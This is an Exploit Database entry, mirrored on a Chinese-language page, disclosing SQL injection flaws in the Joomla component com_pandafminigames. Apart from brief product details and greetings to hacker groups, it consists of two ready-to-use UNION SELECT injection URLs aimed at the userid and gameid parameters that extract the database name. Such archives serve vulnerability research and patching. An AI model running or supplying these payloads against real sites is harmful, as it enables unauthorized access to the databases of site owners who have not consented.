Joomla! Component com_pandafminigames – SQL Injection

• Exploit Database
• 10 阅读

• 作者： Valentin
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12270/

• # Exploit Title: Joomla Component com_pandafminigames SQL Injection Vulnerabilities
  # Date: 16.04.2010
  # Author: Valentin
  # Category: webapps/0day
  # Version: unknown
  # Tested on: 
  # CVE :
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  |:: >> General Information 
  |:: Advisory/Exploit Title = Joomla Component com_pandafminigames SQL Injection Vulnerabilities
  |:: By = Valentin Hoebel
  |:: Contact = valentin@xenuser.org
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Product information
  |:: Name = com_pandafminigames
  |:: Affected Version(s) = unknown
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  |:: >> #1 Vulnerability
  |:: Type = multiple SQL Injection vulnerabilities
  |:: Example URL #1 = index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(database()),2,concat(database()),4,5,6,7,8,9,10,11,12-- 
  |:: Example URL #2 = index.php?option=com_pandafminigames&Itemid=XX&gameid=X+AND+1=2+UNION+SELECT+concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),7,8-- 
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Additional Information
  |:: Advisory/Exploit Published = 16.04.2010
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Misc
  |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
  |::
  |:: 
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]